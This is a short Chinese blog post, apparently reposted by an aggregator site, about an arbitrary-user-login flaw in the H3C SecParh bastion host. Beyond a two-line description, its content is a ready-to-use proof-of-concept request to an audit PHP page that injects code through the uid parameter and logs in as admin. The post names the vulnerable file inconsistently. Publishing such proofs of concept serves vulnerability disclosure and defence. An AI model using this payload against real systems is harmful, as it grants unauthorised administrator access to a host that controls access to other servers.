H3C SecParh堡垒机任意用户登录
Posted 李白你好
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了H3C SecParh堡垒机任意用户登录相关的知识,希望对你有一定的参考价值。
漏洞描述:
H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞
与齐治堡垒机出现的漏洞相似
漏洞复现:
POC:
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
以上是关于H3C SecParh堡垒机任意用户登录的主要内容,如果未能解决你的问题,请参考以下文章